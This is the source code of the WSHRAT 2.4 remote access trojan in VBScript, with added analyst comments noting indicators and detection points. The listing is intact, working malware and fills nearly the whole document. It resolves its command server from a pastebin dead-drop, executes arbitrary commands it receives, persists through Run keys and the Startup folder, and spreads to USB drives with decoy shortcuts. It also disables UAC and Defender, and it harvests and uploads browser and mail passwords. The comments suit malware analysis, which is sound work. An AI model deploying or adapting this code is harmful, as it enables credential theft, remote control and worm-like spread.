
WshRAT 2.4 Visual Basic

  1. '<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
  2.  
  3. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4.  
     ' ---- Analyst notes: static configuration of the WSHRAT 2.4 client ----
     ' Nothing here is validated. The C2 host is fetched over plain HTTP at
     ' startup (see getHost) and every feature flag is a hard-coded boolean.
  5. host = getHost()  ' C2 hostname resolved from a pastebin dead-drop URL; plain HTTP
  6. port = 7777  ' C2 port; every beacon goes to http://<host>:7777/<command> (see post)
  7. installdir = "%appdata%"  ' expanded later; falls back to %temp% if the folder is missing
  8. runAsAdmin = false  ' when true, startupElevate() relaunches via ShellExecute "runas" (UAC prompt)
  9. lnkfile = true  ' USB spreading: hide files on removable drives and drop .lnk decoys (see install)
  10. lnkfolder = true  ' USB spreading: same treatment for top-level folders
  11. registry = true  ' persistence via HKCU and HKLM ...\CurrentVersion\Run (see upstart)
  12. startupfold = true  ' persistence via a copy in the user's Startup folder
  13. anti_bot = false  ' crude sandbox gate, disabled in this build
  14.  
     ' hwid() (defined below) returns the first volume serial found, or Empty
     ' when none is found; it never yields the literal string "null", so this
     ' gate does not quit as written.
  15. if anti_bot = true then
  16.     if hwid = "null" then
  17.         wscript.quit
  18.     end if
  19. end if
  20.  
  21. if runAsAdmin = true then
  22.     startupElevate()  ' relaunch with the /elevated named argument
  23. end if
  24.  
     ' /elevated is only ever set by the agent's own relaunch (startupElevate or
     ' the "elevate" command). As soon as it runs elevated it disables UAC
     ' (EnableLUA=0, ConsentPromptBehaviorAdmin=0) -- see disableSecurity.
  25. if WScript.Arguments.Named.Exists("elevated") = true then
  26.     disableSecurity()
  27. end if
  28.  
  29. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  30.  
     ' Shared COM objects used throughout the script.
  31. dim shellobj
  32. set shellobj = wscript.createobject("wscript.shell")  ' process launch, registry reads/writes, shortcut creation
  33. dim filesystemobj
  34. set filesystemobj = createobject("scripting.filesystemobject")  ' file and drive enumeration
  35. dim httpobj
  36. set httpobj = createobject("msxml2.xmlhttp")  ' C2 channel used by post()
  37.  
  38.  
  39. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  40.  
     ' Runtime paths and state. Install location is %appdata%\<scriptname>
     ' (or %temp%\<scriptname> when %appdata% does not exist) plus a copy in
     ' the Startup folder; these paths are the main host-based indicators.
  41. installname = wscript.scriptname  ' the agent keeps whatever file name it was dropped with
  42. startup = shellobj.specialfolders ("startup") & "\"
  43. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  44. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  45. spliter = "|"  ' field separator for C2 replies and for the fingerprint string
  46. sdkpath = installdir & "wshsdk"  ' extraction directory for the downloaded "SDK" zip
     ' The chr() sequence (112 121 116 104 111 110 46 101 120 101) spells
     ' "python.exe", i.e. <installdir>\wshsdk\python.exe -- obfuscated to avoid
     ' the literal string.
  47. sdkfile = sdkpath & "\" & chr(112) & chr(121) & chr(116) & chr(104) & chr(111) & chr(110) & chr(46) & chr(101) & chr(120) & chr(101)
  48. sleep = 5000  ' beacon interval in milliseconds; changeable via the "sleep" command
  49. dim response
  50. dim cmd
  51. dim param
  52. info = ""
  53. usbspreading = ""  ' populated by instance() from HKLM\software\<name>\
  54. startdate = ""
  55. dim oneonce  ' text stream held open on the install file as a single-instance lock (see instance)
  56.  
  57. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
     ' ---- Main loop: beacon and command dispatch ----
     ' Each iteration re-asserts persistence and USB spreading (install), POSTs
     ' "is-ready" to the C2, splits the reply on "|" and dispatches on the first
     ' field. Errors are suppressed globally from this point on, so failed
     ' commands are silent. Command names below are literal and make useful
     ' network signatures (note the misspelled "excecute").
  58. on error resume next
  59.  
  60.  
  61. instance  ' single-instance lock; relaunches from the install path if needed
  62.  
  63. if getBinder() <> false then  ' getBinder / runBinder are not defined in this listing
  64.     runBinder()
  65. end if
  66.  
  67. while true
  68.  
  69. install  ' persistence refresh + removable-drive spreading, every beacon
  70.  
  71. response = ""
  72. response = post ("is-ready","")  ' beacon; the reply body is the command line
  73. cmd = split (response,spliter)
  74. select case cmd (0)
  75. case "disconnect"
  76.       wscript.quit
  77. case "reboot"
  78.       shellobj.run "%comspec% /c shutdown /r /t 0 /f", 0, TRUE
  79. case "shutdown"
  80.       shellobj.run "%comspec% /c shutdown /s /t 0 /f", 0, TRUE
  81. case "excecute"
  82.       param = cmd (1)
  83.       execute param  ' runs arbitrary VBScript supplied by the C2
  84. case "install-sdk"
  85.       if filesystemobj.fileExists(sdkfile) then
  86.         updatestatus("SDK+Already+Installed")  ' updatestatus is not defined in this listing
  87.       else
  88.         installsdk()
  89.       end if
  90. case "get-pass"
  91.        passgrabber cmd(1), "cmdc.exe", cmd(2)  ' cmd(1) = tool URL/blob, cmd(2) = target ("ie", "chrome", "mozilla", "foxmail" or other)
  92. case "get-pass-offline"
  93.       if filesystemobj.fileExists(sdkfile) then
  94.         passgrabber cmd(3), "cmdv.exe", "ie"
  95.         passgrabber "null", "cmdv.exe", "chrome"
  96.         passgrabber "null", "cmdv.exe", "mozilla"
  97.         passgrabber2 cmd(1), "cmdc.exe", cmd(2)
  98.       else
  99.         updatestatus("Installing+SDK")
  100.         stat = installsdk()
  101.         if stat = true then
  102.             passgrabber cmd(3), "cmdv.exe", "ie"
  103.             passgrabber "null", "cmdv.exe", "chrome"
  104.             passgrabber "null", "cmdv.exe", "mozilla"
  105.             passgrabber2 cmd(1), "cmdc.exe", cmd(2)
  106.         else
  107.             msg = shellobj.ExpandEnvironmentStrings("%computername%") & "/" & shellobj.ExpandEnvironmentStrings("%username%")
  108.             post "show-toast", "Unable to automatically recover password for " & msg & " as the Password Recovery SDK cannot be automatically installed. You can try again manually."
  109.         end if
  110.       end if
     ' Self-update: everything after the first "|" in the raw reply is written
     ' over the install file, then the new copy is launched and this one quits.
     ' The lock handle (oneonce) is closed first so the file can be opened for write.
  111. case "update"
  112.       param = mid(response, instr(response, "|") + 1)
  113.       oneonce.close
  114.       set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  115.       oneonce.write param
  116.       oneonce.close
  117.       shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  118.       wscript.quit
  119. case "uninstall"
  120.       uninstall
  121. case "up-n-exec"
  122.       download cmd (1),cmd (2)  ' download is not defined in this listing
  123. case "bring-log"
  124.       upload installdir & "wshlogs\" & cmd (1), "take-log"  ' exfiltrate a file from <installdir>\wshlogs
  125. case "down-n-exec"
  126.       sitedownloader cmd (1),cmd (2)  ' sitedownloader is not defined in this listing
  127. case  "filemanager"
  128.       servicestarter cmd(1), "fm-plugin.exe", information()  ' plugin dropper helpers are not in this listing
  129. case  "rdp"
  130.       keyloggerstarter cmd(1), "rd-plugin.exe", information(), "", true
  131. case  "rev-proxy"
  132.       reverseproxy "rprox.exe", cmd(1)  ' drops and runs <installdir>\rprox.exe
  133. case  "exit-proxy"
  134.       shellobj.run "%comspec% /c taskkill /F /IM rprox.exe", 0, true
  135. case  "keylogger"
  136.       keyloggerstarter cmd(1), "kl-plugin.exe", information(), 0, false
  137. case  "offline-keylogger"
  138.       keyloggerstarter cmd(1), "kl-plugin.exe", information(), 1, false
  139. case  "browse-logs"
  140.       post "is-logs", enumfaf(installdir & "wshlogs")  ' enumfaf is not defined in this listing
  141. case  "cmd-shell"
  142.       param = cmd (1)
  143.       post "is-cmd-shell",cmdshell (param)  ' cmdshell is not defined in this listing
  144. case  "get-processes"
  145.       post "is-processes", enumprocess()
     ' &H80000002 is HKEY_LOCAL_MACHINE. Disables UAC and, via the Defender
     ' policy key, Defender itself. Only works when already running elevated.
  146. case  "disable-uac"
  147.       if WScript.Arguments.Named.Exists("elevated") = true then
  148.         set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  149.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0
  150.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0
  151.         oReg.SetDwordValue &H80000002,"SOFTWARE\Policies\Microsoft\Windows Defender","DisableAntiSpyware", 1
  152.         oReg = nothing
  153.         updatestatus("UAC+Disabled+(Reboot+Required)")
  154.       end if
  155. case  "check-eligible"
  156.       if filesystemobj.fileExists(cmd(1)) then
  157.         updatestatus("Is+Eligible")
  158.       else
  159.         updatestatus("Not+Eligible")
  160.       end if
  161. case  "rev-rdp":
  162.       reverserdp cmd(3) & ".exe", cmd(1), cmd(2)  ' downloads cmd(2) to <installdir>\<cmd(3)>.exe
  163. case  "force-eligible"
  164.       if WScript.Arguments.Named.Exists("elevated") = true then
  165.         if filesystemobj.folderExists(cmd(1)) then
  166.             shellobj.run "%comspec% /c " & cmd(2), 0, true  ' arbitrary elevated command line from the C2
  167.             updatestatus("SUCCESS")
  168.         else
  169.             updatestatus("Component+Missing")
  170.         end if
  171.       else
  172.         updatestatus("Elevation+Required")
  173.       end if
     ' UAC bypass is not attempted; this simply re-launches itself with the
     ' "runas" verb, i.e. it depends on the user accepting the consent prompt.
  174. case  "elevate"
  175.       if WScript.Arguments.Named.Exists("elevated") = false then
  176.         on error resume next
  177.         oneonce.close()
  178.         oneonce = nothing
  179.         WScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1
  180.         updatestatus("Client+Elevated")
  181.         WScript.quit
  182.       else
  183.         updatestatus("Client+Elevated")
  184.       end if
  185. case  "if-elevate"
  186.       if WScript.Arguments.Named.Exists("elevated") = false then
  187.         updatestatus("Client+Not+Elevated")
  188.       else
  189.         updatestatus("Client+Elevated")
  190.       end if
  191. case  "kill-process"
  192.       exitprocess(cmd(1))  ' exitprocess is not defined in this listing
  193. case  "sleep"
  194.       param = cmd (1)
     ' eval() on the C2-supplied value: any VBScript expression is evaluated,
     ' not just a number.
  195.       sleep = eval (param)        
  196. end select
  197.  
  198. wscript.sleep sleep
  199.  
  200. wend
  201.  
     ' Fetches the "password recovery SDK" (a zip the C2 points to via the
     ' "moz-sdk" request) into <installdir>\wshsdk.zip and unpacks it into
     ' sdkpath. No integrity or origin check: "success" only means the zip
     ' exists on disk after the request.
     ' Returns: true when the zip was written (and extraction attempted), else false.
  202. function installsdk()
  203.     on error resume next
  204.     success = false
  205.     sdkurl = post ("moz-sdk","")  ' C2 reply body is the download URL
  206.     set objhttpdownload = createobject("msxml2.xmlhttp")
  207.     objhttpdownload.open "get",sdkurl, false
  208.     objhttpdownload.setrequestheader "cache-control:", "max-age=0"
  209.     objhttpdownload.send
  210.                          
  211.     if  filesystemobj.fileexists (installdir & "wshsdk.zip") then
  212.         filesystemobj.deletefile (installdir & "wshsdk.zip")
  213.     end if
  214.     if  objhttpdownload.status = 200 then
  215.         dim  objstreamdownload
  216.         set  objstreamdownload = createobject("adodb.stream")
  217.         with objstreamdownload
  218.              .type = 1
  219.              .open
  220.              .write objhttpdownload.responsebody
  221.              .savetofile installdir & "wshsdk.zip"
  222.              .close
  223.         end with
  224.         set objstreamdownload  = nothing
  225.     end if
  226.     if filesystemobj.fileexists(installdir & "wshsdk.zip") then
  227.         'unzip the file
  228.         UnZip installdir & "wshsdk.zip", sdkpath
  229.         success = true  ' set regardless of whether UnZip actually extracted anything
  230.         updatestatus("SDK+Installed")
  231.     end if
  232.     installsdk = success
  233. end function
  234.  
     ' Persistence refresh plus removable-media spreading. For every ready drive
     ' of drivetype 1 (removable): copy the script to the drive root, mark it
     ' hidden+system (attributes 2+4), then hide every top-level file/folder and
     ' drop a same-named .lnk beside it that runs cmd.exe to start the agent and
     ' then open the original item. Detection: hidden+system files at the root
     ' of USB drives next to .lnk files whose target is cmd.exe.
  235. sub install
  236. on error resume next
  237. dim lnkobj
  238. dim filename
  239. dim foldername
  240. dim fileicon
  241. dim foldericon
  242.  
  243. upstart  ' re-write Run keys and Startup copy on every call
  244. for each drive in filesystemobj.drives
  245.  
  246. if  drive.isready = true then
  247. if  drive.freespace  > 0 then
  248. if  drive.drivetype  = 1 then
  249.     filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  250.     if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  251.         filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  252.     end if
  253.     for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  254.         if not lnkfile then exit for
  255.         if  instr (file.name,".") then
  256.             if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  257.                 file.attributes = 2+4
  258.                 if  ucase (file.name) <> ucase (installname) then
  259.                     filename = split(file.name,".")
  260.                     set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  261.                     lnkobj.windowstyle = 7
  262.                     lnkobj.targetpath = "cmd.exe"
  263.                     lnkobj.workingdirectory = ""
     ' Shortcut arguments: cmd /c start <agent>&start <original file>&exit.
     ' Spaces in names are wrapped in quotes so the decoy still opens the real file.
  264.                     lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
     ' Icon is taken from the registered DefaultIcon for the file's extension so
     ' the .lnk looks like the hidden original.
  265.                     fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  266.                     if  instr (fileicon,",") = 0 then
  267.                         lnkobj.iconlocation = file.path
  268.                     else
  269.                         lnkobj.iconlocation = fileicon
  270.                     end if
  271.                     lnkobj.save()
  272.                 end if
  273.             end if
  274.         end if
  275.     next
  276.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  277.         if not lnkfolder then exit for
  278.         folder.attributes = 2+4
  279.         foldername = folder.name
  280.         set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  281.         lnkobj.windowstyle = 7
  282.         lnkobj.targetpath = "cmd.exe"
  283.         lnkobj.workingdirectory = ""
  284.         lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  285.         foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  286.         if  instr (foldericon,",") = 0 then
  287.             lnkobj.iconlocation = folder.path
  288.         else
  289.             lnkobj.iconlocation = foldericon
  290.         end if
  291.         lnkobj.save()
  292.     next
  293. end If
  294. end If
  295. end if
  296. next
  297. err.clear
  298. end sub
  299.  
     ' Removes persistence (both Run keys, Startup copy, the running script
     ' file) and reverses the removable-drive changes: clears attributes on
     ' hidden items, deletes the decoy .lnk files and the agent copy. Then quits.
     ' Note: the copy under installdir is only removed if that is where the
     ' script is currently running from (wscript.scriptfullname).
  300. sub uninstall
  301. on error resume next
  302. dim filename
  303. dim foldername
  304.  
  305. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  306. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  307. filesystemobj.deletefile startup & installname ,true
  308. filesystemobj.deletefile wscript.scriptfullname ,true
  309.  
  310. for  each drive in filesystemobj.drives
  311. if  drive.isready = true then
  312. if  drive.freespace  > 0 then
  313. if  drive.drivetype  = 1 then
  314.     for  each file in filesystemobj.getfolder ( drive.path & "\").files
  315.          on error resume next
  316.          if  instr (file.name,".") then
  317.              if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  318.                  file.attributes = 0
  319.                  if  ucase (file.name) <> ucase (installname) then
  320.                      filename = split(file.name,".")
  321.                      filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  322.                  else
  323.                      filesystemobj.deletefile (drive.path & "\" & file.name)
  324.                  end If
  325.              else
  326.                  filesystemobj.deletefile (file.path)  ' deletes every .lnk at the drive root, not only the decoys
  327.              end if
  328.          end if
  329.      next
  330.      for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  331.          folder.attributes = 0
  332.      next
  333. end if
  334. end if
  335. end if
  336. next
  337. wscript.quit
  338. end sub
  339.  
     ' C2 transport: synchronous HTTP POST to http://<host>:<port>/<cmd> with
     ' the body = param. The host fingerprint (information) is sent as the
     ' User-Agent header, so every request carries a UA beginning with
     ' "WSHRAT|" -- a reliable network signature. Returns the response text;
     ' if the request fails the initial value (param) may be returned instead.
  340. function post (cmd ,param)
  341.  
  342. post = param
  343. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  344. httpobj.setrequestheader "user-agent:",information
  345. httpobj.send param
  346. post = httpobj.responsetext
  347. end function
  348.  
     ' Builds (once, cached in the global inf) the victim fingerprint:
     '   WSHRAT|<volume serial>|<computername>|<username>|<OS caption>|plus|<AV names>|<usbspreading>|Visual Basic-v2.4|<cc:country>
     ' It is sent as the User-Agent on every C2 request (see post).
  349. function information
  350. on error resume next
  351. if  inf = "" then
  352.     inf = hwid & spliter
  353.     inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  354.     inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  355.  
  356.     set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  357.     set os = root.execquery ("select * from win32_operatingsystem")
  358.     for each osinfo in os
  359.        inf = inf & osinfo.caption & spliter  
  360.        exit for
  361.     next
  362.     inf = inf & "plus" & spliter
  363.     inf = inf & security & spliter  ' installed AV product names via WMI SecurityCenter
  364.     inf = inf & usbspreading
  365.     inf = "WSHRAT" & spliter & inf & spliter & "Visual Basic-v2.4" & spliter & getCountry()
  366.     information = inf
  367. else
  368.     information = inf
  369. end if
  370. end function
  371.  
     ' Dead-drop resolver: downloads a pastebin "raw" page with a browser-like
     ' User-Agent and uses the response body, verbatim, as the C2 host. Lets the
     ' operator rotate C2 without touching the agent. If the request does not
     ' return 200, getHost is never assigned (the fallback assignment only runs
     ' when phost is not an http:// URL), so host is left Empty.
  372. function getHost()
  373.     phost = "http://pastebin.com/raw/WMWTqMa3"
  374.     if instr(phost, "http://") = 1 then
  375.         on error resume next
  376.         set objhttpdownload = CreateObject("msxml2.xmlhttp" )
  377.         objhttpdownload.open "get", phost, false
  378.         objhttpdownload.setRequestHeader "user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
  379.         objhttpdownload.send
  380.        
  381.         if objhttpdownload.status = 200 then
  382.             set objstreamdownload = CreateObject("adodb.stream")
  383.             objstreamdownload.Type = 1
  384.             objstreamdownload.Open
  385.             objstreamdownload.Write(objhttpdownload.responseBody)
  386.             objstreamdownload.Position = 0
  387.             objstreamdownload.Type = 2
  388.             objstreamdownload.CharSet = "us-ascii"
  389.             phost = objstreamdownload.ReadText  ' no trimming or validation of the page body
  390.             objstreamdownload.close
  391.             set objstreamdownload = nothing
  392.             getHost = phost
  393.         end if
  394.     else
  395.         getHost = phost
  396.     end if
  397. end function
  398.  
     ' Geolocates the victim by querying http://ip-api.com/json/ and scraping
     ' "countryCode" and "country" from the JSON with fixed offsets (no JSON
     ' parser). Returns "<cc>:<country>"; the "01"/"Unknown" defaults are
     ' overwritten unconditionally, so a failed request yields empty fields
     ' rather than the defaults. The outbound request to ip-api.com is itself
     ' a detection opportunity.
  399. function getCountry()
  400.     on error resume next
  401.     set objhttpdownload = createobject("msxml2.xmlhttp" )
  402.     objhttpdownload.open "get", "http://ip-api.com/json/", false
  403.     objhttpdownload.setRequestHeader "user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36"
  404.     objhttpdownload.send
  405.      
  406.     if objhttpdownload.status = 200 then
  407.        dim  objstreamdownload, raw, cc, cn
  408.        set  objstreamdownload = createobject("adodb.stream")
  409.        with objstreamdownload
  410.             .type = 1
  411.             .open
  412.             .write objhttpdownload.responsebody
  413.             .position = 0
  414.             .type = 2
  415.             .charset = "us-ascii"
  416.             raw = .readtext
  417.        end with
  418.        set objstreamdownload = nothing
  419.     end if
  420.     cc = "01"
  421.     cn = "Unknown"
  422.     cc = mid(raw, instr(raw, "countryCode") + 14)  ' skips `countryCode":"`
  423.     cc = mid(cc, 1, instr(cc, chr(34)) -1)
  424.    
  425.     cn = mid(raw, instr(raw, "country") + 10)  ' skips `country":"`
  426.     cn = mid(cn, 1, instr(cn, chr(34)) -1)
  427.            
  428.     getCountry = cc & ":" & cn
  429. end function
  430.  
     ' Persistence. Writes a Run value named after the script's base name under
     ' both HKCU and HKLM (the HKLM write silently fails without admin rights)
     ' with data `wscript.exe //B "<installdir>\<installname>"`, copies the
     ' script into installdir, and optionally into the Startup folder.
     ' Called from instance() and on every main-loop iteration via install.
  431. sub upstart ()
  432. on error resume Next
  433. if registry = true then
  434. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  435. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  436. end if
  437.  
  438. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  439. if startupfold = true then
  440. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  441. end if
  442. end sub
  443.  
  444.  
     ' Victim identifier: the VolumeSerialNumber of the first Win32_LogicalDisk
     ' that has one. Returns Empty (never the string "null") when none is found
     ' or the WMI query fails.
  445. function hwid
  446. on error resume next
  447.  
  448. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  449. set disks = root.execquery ("select * from win32_logicaldisk")
  450. for each disk in disks
  451.     if  disk.volumeserialnumber <> "" then
  452.         hwid = disk.volumeserialnumber
  453.         exit for
  454.     end if
  455. next
  456. end function
  457.  
  458.  
     ' Enumerates installed AV products through WMI: root\SecurityCenter2 on
     ' OS major version > 6, else root\SecurityCenter. Returns the display
     ' names joined with " ." or "nan-av" when none is found. Errors are
     ' suppressed throughout; note the version-building loop indexes with `i`
     ' rather than the loop variable `x`, so the osversion value is not a
     ' faithful reconstruction of objitem.version.
  459. function security
  460. on error resume next
  461.  
  462. security = ""
  463.  
  464. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  465. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  466. for each objitem in colitems
  467.     versionstr = split (objitem.version,".")
  468. next
  469. versionstr = split (colitems.version,".")
  470. osversion = versionstr (0) & "."
  471. for  x = 1 to ubound (versionstr)
  472.      osversion = osversion &  versionstr (i)
  473. next
  474. osversion = eval (osversion)
  475. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  476.  
  477. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  478. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  479.  
  480. for each objantivirus in colantivirus
  481.     security  = security  & objantivirus.displayname & " ."
  482. next
  483. if security  = "" then security  = "nan-av"
  484. end function
  485.  
     ' Startup bookkeeping:
     '  1. Records whether this copy was launched from a drive root (X:\<name>,
     '     i.e. via USB spreading) as "true - <date>" / "false - <date>" under
     '     HKLM\software\<basename>\ (a host-based indicator; write fails
     '     silently without admin rights).
     '  2. Calls upstart to (re)install, then if the running file is not the
     '     install-path copy, launches that copy and exits.
     '  3. Opens the install file for append and keeps the handle (oneonce) as
     '     a single-instance lock: a second instance fails to open it and quits.
  486. function instance
  487. on error resume next
  488.  
  489. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  490. if usbspreading = "" then
  491.    if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  492.       usbspreading = "true - " & date
  493.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  494.    else
  495.       usbspreading = "false - " & date
  496.       shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  497.  
  498.    end if
  499. end If
  500.  
  501. upstart
  502. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  503. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  504. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  505.     shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  506.     wscript.quit
  507. end If
  508. err.clear
  509. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)  ' mode 8 = ForAppending; held open as the lock
  510. if  err.number > 0 then wscript.quit
  511. end function
  512.  
     ' Relaunches the script through ShellExecute with the "runas" verb and the
     ' /elevated named argument, then exits. This is a plain UAC consent prompt,
     ' not a bypass; the elevated copy disables UAC on start (see disableSecurity).
  513. sub startupElevate()
  514.     if WScript.Arguments.Named.Exists("elevated") = false then
  515.         on error resume next
  516.         WScript.CreateObject("Shell.Application").ShellExecute "wscript.exe", " //B " & chr(34) & WScript.ScriptFullName & chr(34) & " /elevated", "", "runas", 1
  517.         WScript.quit
  518.     end if
  519. end sub
  520.  
     ' Runs only when launched with /elevated. Sets, under HKEY_LOCAL_MACHINE
     ' (&H80000002), Policies\System\EnableLUA = 0 and
     ' ConsentPromptBehaviorAdmin = 0, i.e. turns UAC off for the machine.
     ' Monitoring writes to these two values is a high-signal detection.
  521. sub disableSecurity()
  522.     if WScript.Arguments.Named.Exists("elevated") = true then
  523.         set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  524.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","EnableLUA", 0
  525.         oReg.SetDwordValue &H80000002,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System","ConsentPromptBehaviorAdmin", 0
  526.         oReg = nothing
  527.     end if
  528. end sub
  529.  
     ' Base64 -> text via an MSXML element with DataType "bin.base64" and an
     ' ADODB.Stream re-read as us-ascii. Used by passgrabber("ie") to decode a
     ' C2-supplied script before handing it to executeglobal.
  530. function decode_base64(base64_string)
  531.     Set yhm_pepe = CreateObject("ADODB.Stream")
  532.     Set spike = CreateObject("Microsoft.XMLDOM").createElement("tmp")
  533.     spike.DataType = "bin.base64"
  534.     spike.Text = base64_string
  535.     yhm_pepe.Type = 1
  536.     yhm_pepe.Open
  537.     yhm_pepe.Write spike.NodeTypedValue
  538.     yhm_pepe.Position = 0
  539.     yhm_pepe.Type = 2
  540.     yhm_pepe.CharSet = "us-ascii"
  541.     decode_base64 = yhm_pepe.ReadText
  542. end function
  543.  
     ' Browser/mail credential decryption stage. Requests a script from the C2
     ' ("give-me-ffpv" for Firefox, "give-me-chpv" for Chrome, "give-me-fm" for
     ' Foxmail), substitutes %nss% (path to the bundled NSS libs under
     ' <sdkpath>\nss) and %path% (the copied Chrome "Login Data" file), writes
     ' it to <installdir>\rundll and runs it with the bundled python.exe
     ' (sdkfile). stdout is captured in <installdir>\wshout and POSTed back
     ' under the retcmd name. Both temp files are deleted afterwards.
     ' Host indicators: wshsdk\python.exe spawned by cmd.exe with an argument
     ' named "rundll", and a file named wshout in %appdata%/%temp%.
  544. sub decode_pass(retcmd)
  545.     dim content, nss, command
  546.     if retcmd = "mozilla" then
  547.         command = "give-me-ffpv"
  548.     elseif retcmd = "chrome" then
  549.         command = "give-me-chpv"
  550.     elseif retcmd = "foxmail" then
  551.         command = "give-me-fm"
  552.     end if
  553.     set objhttpdownload = createobject("msxml2.xmlhttp")
  554.     set objfsodownload = createobject ("scripting.filesystemobject")
  555.     objhttpdownload.open "post","http://" & host & ":" & port &"/" & command, false
  556.     objhttpdownload.setrequestheader "user-agent:",information
  557.     objhttpdownload.send ""
  558.                          
  559.     if  objfsodownload.fileexists (installdir & "rundll") then
  560.         objfsodownload.deletefile (installdir & "rundll")
  561.     end if
  562.     if  objhttpdownload.status = 200 then
  563.         dim  objstreamdownload
  564.         set  objstreamdownload = createobject("adodb.stream")
  565.         with objstreamdownload
  566.              .type = 1
  567.              .open
  568.              .write objhttpdownload.responsebody
  569.              .position = 0
  570.              .type = 2
  571.              .charset = "us-ascii"
  572.              content = .readtext
  573.              nss = sdkpath & "\nss"
  574.              content = Replace(content, "%nss%", nss) 'for firefox
  575.              content = Replace(content, "%path%", installdir & "Login Data") 'for chrome
  576.              objfsodownload.opentextfile(installdir & "rundll", 2, true).write(content)
  577.              .close
  578.         end with
  579.         set objstreamdownload  = nothing
  580.     end if
  581.    
     ' cmd /c cd "<sdkpath>" && <short path of python.exe> <short path of rundll> > "<installdir>\wshout"
  582.     shellobj.run "%comspec% /c cd " & chr(34) & sdkpath & chr(34) & " && " &  gsp(sdkfile) & " " & gsp(installdir & "rundll") & " > " & chr(34) & installdir & "wshout" & chr(34), 0, true
  583.     wscript.sleep(2000)
  584.     content = objfsodownload.opentextfile(installdir & "wshout").readall
  585.     objfsodownload.deletefile (installdir & "rundll")
  586.     objfsodownload.deletefile (installdir & "wshout")
  587.     post retcmd, content  ' exfiltration: decrypted credentials in the POST body
  588. end sub
  589.  
